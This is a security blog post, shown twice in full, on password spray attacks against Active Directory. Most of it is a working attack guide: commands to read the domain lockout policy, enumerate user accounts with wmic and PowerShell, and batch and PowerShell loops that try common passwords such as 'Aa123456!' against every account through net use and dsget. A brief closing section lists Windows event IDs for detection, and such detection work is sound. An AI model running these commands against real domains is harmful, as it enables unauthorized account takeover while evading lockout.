CYBERDOM

Just another day of IR, Threat-Hunting & Microsoft Security

Active Directory Password Spray Attack

by · May 19, 2018

In a password spray attack, the hacker tries the most common passwords across many different accounts and services to gain access to any password-protected assets they can find. Usually, these span many various organizations and identity providers.

For example, a hacker will use a commonly available toolkit to enumerate all of the users in several organizations and then try a common password against all of those accounts.

For the hacker, it’s a numbers game: they know that some passwords are very common. Even though these most common passwords account for only 5% of accounts, the hacker will get a few successes for every thousand accounts attacked, and that’s enough to be effective.

They use the accounts to get emails, harvest contact info, send phishing links, or expand the password spray target group. The hacker doesn’t care much about who those initial targets are—just that they have some success that they can leverage.

Post Contents Show

The way to run Password Spray Attack

First, the hacker creates a list of account names either using PowerShell or the command line and querying Active Directory or harvesting usernames from open source. 

Then a shared password is used, say “P@ssw0rd” or “Aa123456!” and login is attempted for each username on the list. 

Because of account lockout policies, this action needs to be done so that users do not get locked out of their accounts.  Guess one single password for each user per observation window, so you don’t risk locking out accounts.

First, check the password policy, which includes the lockout settings with the following command
net accounts /domain

The way to run Password Spray Attack
Once you know the password policy, you can create a list using PowerShell or CMD with the following command:

wmic UserAccount Get Name > C:\Attack\PSSpray.txt

Optional PowerShell command to view all users with one line command:

([adsisearcher]"objectCategory=User").Findall() | ForEach {$_.properties.samaccountname}

image

Then test each credential with the following “FOR” loop that mounts the share “\’ %LOGONSERVER%’\IPC$” using each username in userlist.txt and the password which you have placed in the file “pass1.txt”:

@FOR /F %n in (PSSpray.txt) DO @FOR /F %p in (C:\Attack\Password.txt) DO @net use %LOGONSERVER%\IPC$ /user:%USERDOMAIN%\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\A-DC01\IPC$ > NUL

Another useful script to run password spray

Get-ADUser -SearchBase “OU=CloudUsers,dc=Cloud,dc=ms” –Filter * -ResultSetSize 100| Select distinguishedName | ConvertTo-Csv -NoTypeInformation | select -Skip 1 | SetContent PasswordSpary.txt

Foreach ($FQDN in Get-Content .\PasswordSpary.txt) { $results = dsget user $FQDN -samid $samid = $results[1].replace(" ", "") dsget user $FQDN -u $samid -p ‘Aa123456!' > $null if ($?) { Write-Host "Account: $samid; Password: Aa123456!" } }

Note: Make sure to add a common password to Password.txt

The simple way is to run the DomainPasswordSpray.ps1 script to run against all users or half of them with a standard password.

Active Directory Password Spray Attack
Tip: You can run a password spray attack with network share or Active Directory connection

How to Detect Password Spray Attack

To detect password spraying, we need to pay attention to the windows security event, which means an account failed to log on. Reports fail to log on all the time.

However, if one computer fails to log in with several correct usernames but the wrong password, that should be considered. You can find all this information by looking at the Windows event log. The fields that we need to correlate against are:

  • Login Type
  • Account Name
  • Status
  • Sub Status
  • Workstation Name
  • Source Network Address

To detect all Password Spraying, you need the following event ID from the security event log:

  • 4771
  • 4648
  • 4625

image
image

In conclusion

We will hope to compromise one or more accounts during the password spraying attack by guessing their passwords, all without triggering the AD lockout policy on any accounts. When using password spray, the prevailing assumption is you cannot make brute force attacks, and you need to try several passwords less than the domain lockout policy against every account in the domain.

AD Security Inside – Attacks Introduction

Active Directory Password Spray Attack

by · May 19, 2018

In a password spray attack, the hacker tries the most common passwords across many different accounts and services to gain access to any password-protected assets they can find. Usually, these span many various organizations and identity providers.
For example, a hacker will use a commonly available toolkit to enumerate all of the users in several organizations and then try a common password against all of those accounts.
For the hacker, it’s a numbers game: they know that some passwords are very common. Even though these most common passwords account for only 5% of accounts, the hacker will get a few successes for every thousand accounts attacked, and that’s enough to be effective.
They use the accounts to get emails, harvest contact info, send phishing links, or expand the password spray target group. The hacker doesn’t care much about who those initial targets are—just that they have some success that they can leverage.

The way to run Password Spray Attack

First, the hacker creates a list of account names either using PowerShell or the command line and querying Active Directory or harvesting usernames from open source. 
Then a shared password is used, say “P@ssw0rd” or “Aa123456!” and login is attempted for each username on the list. 
Because of account lockout policies, this action needs to be done so that users do not get locked out of their accounts.  Guess one single password for each user per observation window, so you don’t risk locking out accounts.
First, check the password policy, which includes the lockout settings with the following command
net accounts /domain
The way to run Password Spray Attack
Once you know the password policy, you can create a list using PowerShell or CMD with the following command:

wmic UserAccount Get Name > C:\Attack\PSSpray.txt

Optional PowerShell command to view all users with one line command:

([adsisearcher]"objectCategory=User").Findall() | ForEach {$_.properties.samaccountname}

image
Then test each credential with the following “FOR” loop that mounts the share “\’ %LOGONSERVER%’\IPC$” using each username in userlist.txt and the password which you have placed in the file “pass1.txt”:

@FOR /F %n in (PSSpray.txt) DO @FOR /F %p in (C:\Attack\Password.txt) DO @net use %LOGONSERVER%\IPC$ /user:%USERDOMAIN%\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\A-DC01\IPC$ > NUL

Another useful script to run password spray

Get-ADUser -SearchBase “OU=CloudUsers,dc=Cloud,dc=ms” –Filter * -ResultSetSize 100| Select distinguishedName | ConvertTo-Csv -NoTypeInformation | select -Skip 1 | SetContent PasswordSpary.txt
Foreach ($FQDN in Get-Content .\PasswordSpary.txt) { $results = dsget user $FQDN -samid $samid = $results[1].replace(" ", "") dsget user $FQDN -u $samid -p ‘Aa123456!' > $null if ($?) { Write-Host "Account: $samid; Password: Aa123456!" } }

Note: Make sure to add a common password to Password.txt
The simple way is to run the DomainPasswordSpray.ps1 script to run against all users or half of them with a standard password.
Active Directory Password Spray Attack
Tip: You can run a password spray attack with network share or Active Directory connection

How to Detect Password Spray Attack

To detect password spraying, we need to pay attention to the windows security event, which means an account failed to log on. Reports fail to log on all the time.
However, if one computer fails to log in with several correct usernames but the wrong password, that should be considered. You can find all this information by looking at the Windows event log. The fields that we need to correlate against are:

  • Login Type
  • Account Name
  • Status
  • Sub Status
  • Workstation Name
  • Source Network Address

To detect all Password Spraying, you need the following event ID from the security event log:

  • 4771
  • 4648
  • 4625

image
image

In conclusion

We will hope to compromise one or more accounts during the password spraying attack by guessing their passwords, all without triggering the AD lockout policy on any accounts. When using password spray, the prevailing assumption is you cannot make brute force attacks, and you need to try several passwords less than the domain lockout policy against every account in the domain.
AD Security Inside – Attacks Introduction

Tags:

You may also like...

Leave a Reply

error: Content is Protected !!
%d bloggers like this: